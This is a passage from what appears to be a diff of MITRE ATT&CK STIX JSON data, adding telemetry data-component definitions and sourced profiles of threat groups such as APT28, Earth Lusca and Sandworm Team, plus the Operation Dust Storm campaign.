"x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-20T20:22:45.613Z", + "name": "Host Status", + "description": "Logging, messaging, and other artifacts highlighting the health of host sensors (ex: metrics, errors, and/or exceptions from logging applications)", + "x_mitre_data_source_ref": "x-mitre-data-source--4523e7f3-8de2-4078-96f8-1227eb537159", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-13T20:00:08.487Z", + "name": "Permissions Requests", + "description": "Permissions declared in an application's manifest or property list file", + "x_mitre_data_source_ref": "x-mitre-data-source--e156f007-c5bf-45cc-8dd5-d442ffb0d203", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "created": "2023-03-13T20:00:08.487Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-17T19:51:56.531Z", + "name": "Earth Lusca", + "description": "[Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)\n\n[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)", + "aliases": [ + "Earth Lusca", + "TAG-22" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "intrusion-set", + "id": "intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034", + "created": "2022-07-01T20:12:30.184Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G1006", + "external_id": "G1006" + }, + { + "source_name": "TAG-22", + "description": "(Citation: Recorded Future TAG-22 July 2021)" + }, + { + "source_name": "TrendMicro EarthLusca 2022", + "description": "Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.", + "url": "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf" + }, + { + "source_name": "Recorded Future TAG-22 July 2021", + "description": "INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.", + "url": "https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Network Traffic Flow", + "description": "Summarized network packet data, with metrics, such as protocol headers and volume (ex: Netflow or Zeek http.log)", + "x_mitre_data_source_ref": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-20T20:18:06.745Z", + "name": "Network Connection Creation", + "description": "Initial construction of a network connection, such as capturing socket information with a source/destination IP and port(s) (ex: Windows EID 5156, Sysmon EID 3, or Zeek conn.log)", + "x_mitre_data_source_ref": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-13T20:47:52.557Z", + "name": "System Notifications", + "description": "Notifications generated by the OS", + "x_mitre_data_source_ref": "x-mitre-data-source--55ba7d30-887f-42c1-a24e-c4e90aff24b8", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4", + "created": "2023-03-13T20:47:52.557Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-09-30T21:05:22.490Z", + "name": "Operation Dust Storm", + "description": "[Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) was a long-standing persistent cyber espionage campaign that targeted multiple industries in Japan, South Korea, the United States, Europe, and several Southeast Asian countries. By 2015, the [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) threat actors shifted from government and defense-related intelligence targets to Japanese companies or Japanese subdivisions of larger foreign organizations supporting Japan's critical infrastructure, including electricity generation, oil and natural gas, finance, transportation, and construction.(Citation: Cylance Dust Storm)\n\n[Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) threat actors also began to use Android backdoors in their operations by 2015, with all identified victims at the time residing in Japan or South Korea.(Citation: Cylance Dust Storm)", + "aliases": [ + "Operation Dust Storm" + ], + "first_seen": "2010-01-01T07:00:00.000Z", + "last_seen": "2016-02-01T06:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: Cylance Dust Storm)", + "x_mitre_last_seen_citation": "(Citation: Cylance Dust Storm)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--4603cf2f-06d0-4970-9c5d-5071b08c817f", + "created": "2022-09-29T20:00:38.136Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0016", + "external_id": "C0016" + }, + { + "source_name": "Cylance Dust Storm", + "description": "Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.", + "url": "https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ] + }, + { + "modified": "2023-03-13T19:59:42.141Z", + "name": "Network Communication", + "description": "Network requests made by an application or domains contacted", + "x_mitre_data_source_ref": "x-mitre-data-source--e156f007-c5bf-45cc-8dd5-d442ffb0d203", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0", + "created": "2023-03-13T19:59:42.141Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Process Termination", + "description": "Exit of a running process (ex: Sysmon EID 5 or Windows EID 4689)", + "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-13T20:47:24.038Z", + "name": "Permissions Request", + "description": "System prompts triggered when an application requests new or additional permissions", + "x_mitre_data_source_ref": "x-mitre-data-source--55ba7d30-887f-42c1-a24e-c4e90aff24b8", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--e2f72131-14d1-411f-8e8c-aa3453dd5456", + "created": "2023-03-13T20:47:24.038Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-26T17:51:20.401Z", + "name": "APT28", + "description": "[APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub August 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) This group has been active since at least 2004.(Citation: DOJ GRU Indictment Jul 2018)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Crowdstrike DNC June 2016)(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: FireEye APT28 January 2017)(Citation: GRIZZLY STEPPE JAR)(Citation: Sofacy DealersChoice)(Citation: Palo Alto Sofacy 06-2018)(Citation: Symantec APT28 Oct 2018)(Citation: ESET Zebrocy May 2019)\n\n[APT28](https://attack.mitre.org/groups/G0007) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. (Citation: Crowdstrike DNC June 2016) In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://attack.mitre.org/groups/G0007) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.(Citation: US District Court Indictment GRU Oct 2018) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://attack.mitre.org/groups/G0034). ", + "aliases": [ + "APT28", + "IRON TWILIGHT", + "SNAKEMACKEREL", + "Swallowtail", + "Group 74", + "Sednit", + "Sofacy", + "Pawn Storm", + "Fancy Bear", + "STRONTIUM", + "Tsar Team", + "Threat Group-4127", + "TG-4127" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "4.0", + "x_mitre_contributors": [ + "Sébastien Ruel, CGI", + "Drew Church, Splunk", + "Emily Ratliff, IBM", + "Richard Gold, Digital Shadows" + ], + "type": "intrusion-set", + "id": "intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c", + "created": "2017-05-31T21:31:48.664Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0007", + "external_id": "G0007" + }, + { + "source_name": "SNAKEMACKEREL", + "description": "(Citation: Accenture SNAKEMACKEREL Nov 2018)" + }, + { + "source_name": "Fancy Bear", + "description": "(Citation: Crowdstrike DNC June 2016)(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)" + }, + { + "source_name": "Tsar Team", + "description": "(Citation: ESET Sednit Part 3)(Citation: Talos Seduploader Oct 2017)(Citation: Talos Seduploader Oct 2017)" + }, + { + "source_name": "APT28", + "description": "(Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: Crowdstrike DNC June 2016) (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)" + }, + { + "source_name": "STRONTIUM", + "description": "(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Microsoft STRONTIUM Aug 2019)(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)" + }, + { + "source_name": "IRON TWILIGHT", + "description": "(Citation: Secureworks IRON TWILIGHT Profile)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)" + }, + { + "source_name": "Threat Group-4127", + "description": "(Citation: SecureWorks TG-4127)" + }, + { + "source_name": "TG-4127", + "description": "(Citation: SecureWorks TG-4127)" + }, + { + "source_name": "Pawn Storm", + "description": "(Citation: SecureWorks TG-4127)(Citation: ESET Sednit Part 3)(Citation: TrendMicro Pawn Storm Dec 2020) " + }, + { + "source_name": "Swallowtail", + "description": "(Citation: Symantec APT28 Oct 2018)" + }, + { + "source_name": "Group 74", + "description": "(Citation: Talos Seduploader Oct 2017)" + }, + { + "source_name": "Accenture SNAKEMACKEREL Nov 2018", + "description": "Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.", + "url": "https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50" + }, + { + "source_name": "Crowdstrike DNC June 2016", + "description": "Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.", + "url": "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" + }, + { + "source_name": "US District Court Indictment GRU Oct 2018", + "description": "Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.", + "url": "https://www.justice.gov/opa/page/file/1098481/download" + }, + { + "source_name": "GRIZZLY STEPPE JAR", + "description": "Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017.", + "url": "https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf" + }, + { + "source_name": "ESET Zebrocy May 2019", + "description": "ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.", + "url": "https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/" + }, + { + "source_name": "ESET Sednit Part 3", + "description": "ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.", + "url": "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf" + }, + { + "source_name": "Sofacy DealersChoice", + "description": "Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/" + }, + { + "source_name": "FireEye APT28 January 2017", + "description": "FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017.", + "url": "https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf" + }, + { + "source_name": "FireEye APT28", + "description": "FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.", + "url": "https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf" + }, + { + "source_name": "Ars Technica GRU indictment Jul 2018", + "description": "Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. Retrieved September 13, 2018.", + "url": "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/" + }, + { + "source_name": "TrendMicro Pawn Storm Dec 2020", + "description": "Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm’s Lack of Sophistication as a Strategy. Retrieved January 13, 2021.", + "url": "https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html" + }, + { + "source_name": "Securelist Sofacy Feb 2018", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018.", + "url": "https://securelist.com/a-slice-of-2017-sofacy-activity/83930/" + }, + { + "source_name": "Kaspersky Sofacy", + "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.", + "url": "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/" + }, + { + "source_name": "Palo Alto Sofacy 06-2018", + "description": "Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/" + }, + { + "source_name": "Talos Seduploader Oct 2017", + "description": "Mercer, W., et al. (2017, October 22). \"Cyber Conflict\" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.", + "url": "https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html" + }, + { + "source_name": "Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020", + "description": "Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020.", + "url": "https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/" + }, + { + "source_name": "Microsoft STRONTIUM Aug 2019", + "description": "MSRC Team. (2019, August 5). Corporate IoT – a path to intrusion. Retrieved August 16, 2019.", + "url": "https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/" + }, + { + "source_name": "DOJ GRU Indictment Jul 2018", + "description": "Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.", + "url": "https://www.justice.gov/file/1080281/download" + }, + { + "source_name": "Cybersecurity Advisory GRU Brute Force Campaign July 2021", + "description": "NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021.", + "url": "https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF" + }, + { + "source_name": "NSA/FBI Drovorub August 2020", + "description": "NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020.", + "url": "https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF" + }, + { + "source_name": "SecureWorks TG-4127", + "description": "SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016.", + "url": "https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign" + }, + { + "source_name": "Secureworks IRON TWILIGHT Active Measures March 2017", + "description": "Secureworks CTU. (2017, March 30). IRON TWILIGHT Supports Active Measures. Retrieved February 28, 2022.", + "url": "https://www.secureworks.com/research/iron-twilight-supports-active-measures" + }, + { + "source_name": "Secureworks IRON TWILIGHT Profile", + "description": "Secureworks CTU. (n.d.). IRON TWILIGHT. Retrieved February 28, 2022.", + "url": "https://www.secureworks.com/research/threat-profiles/iron-twilight" + }, + { + "source_name": "Symantec APT28 Oct 2018", + "description": "Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018.", + "url": "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government" + }, + { + "source_name": "Sednit", + "description": "This designation has been used in reporting both to refer to the threat group and its associated malware [JHUHUGIT](https://attack.mitre.org/software/S0044).(Citation: FireEye APT28 January 2017)(Citation: SecureWorks TG-4127)(Citation: Kaspersky Sofacy)(Citation: Ars Technica GRU indictment Jul 2018)" + }, + { + "source_name": "Sofacy", + "description": "This designation has been used in reporting both to refer to the threat group and its associated malware.(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Network Traffic Content", + "description": "Logged network traffic data showing both protocol header and body values (ex: PCAP)", + "x_mitre_data_source_ref": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-07T16:14:39.124Z", + "name": "Command Execution", + "description": "The execution of a line of text, potentially with arguments, created from program code (e.g. a cmdlet executed via powershell.exe, interactive commands like >dir, shell executions, etc. )", + "x_mitre_data_source_ref": "x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-07T16:15:56.932Z", + "name": "Process Creation", + "description": "The initial construction of an executable managed by the OS, that may involve one or more tasks or threads. (e.g. Win EID 4688, Sysmon EID 1, cmd.exe > net use, etc.)", + "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "aliases": [ + "Bouncing Golf" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--049cef3b-22d5-4be6-b50c-9839c7a34fdd", + "type": "intrusion-set", + "created": "2020-01-27T16:55:39.688Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0097", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0097" + }, + { + "source_name": "Trend Micro Bouncing Golf 2019", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/", + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. Retrieved January 27, 2020." + } + ], + "modified": "2020-03-26T20:58:44.722Z", + "name": "Bouncing Golf", + "description": "[Bouncing Golf](https://attack.mitre.org/groups/G0097) is a cyberespionage campaign targeting Middle Eastern countries.(Citation: Trend Micro Bouncing Golf 2019)", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-13T20:00:38.029Z", + "name": "Protected Configuration", + "description": "Device configuration options that are not typically utilized by benign applications", + "x_mitre_data_source_ref": "x-mitre-data-source--e156f007-c5bf-45cc-8dd5-d442ffb0d203", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2", + "created": "2023-03-13T20:00:38.029Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-08T22:12:31.238Z", + "name": "Sandworm Team", + "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) is a destructive threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) This group has been active since at least 2009.(Citation: iSIGHT Sandworm 2014)(Citation: CrowdStrike VOODOO BEAR)(Citation: USDOJ Sandworm Feb 2020)(Citation: NCSC Sandworm Feb 2020)\n\nIn October 2020, the US indicted six GRU Unit 74455 officers associated with [Sandworm Team](https://attack.mitre.org/groups/G0034) for the following cyber operations: the 2015 and 2016 attacks against Ukrainian electrical companies and government organizations, the 2017 worldwide [NotPetya](https://attack.mitre.org/software/S0368) attack, targeting of the 2017 French presidential campaign, the 2018 [Olympic Destroyer](https://attack.mitre.org/software/S0365) attack against the Winter Olympic Games, the 2018 operation against the Organisation for the Prohibition of Chemical Weapons, and attacks against the country of Georgia in 2018 and 2019.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) Some of these were conducted with the assistance of GRU Unit 26165, which is also referred to as [APT28](https://attack.mitre.org/groups/G0007).(Citation: US District Court Indictment GRU Oct 2018)", + "aliases": [ + "Sandworm Team", + "ELECTRUM", + "Telebots", + 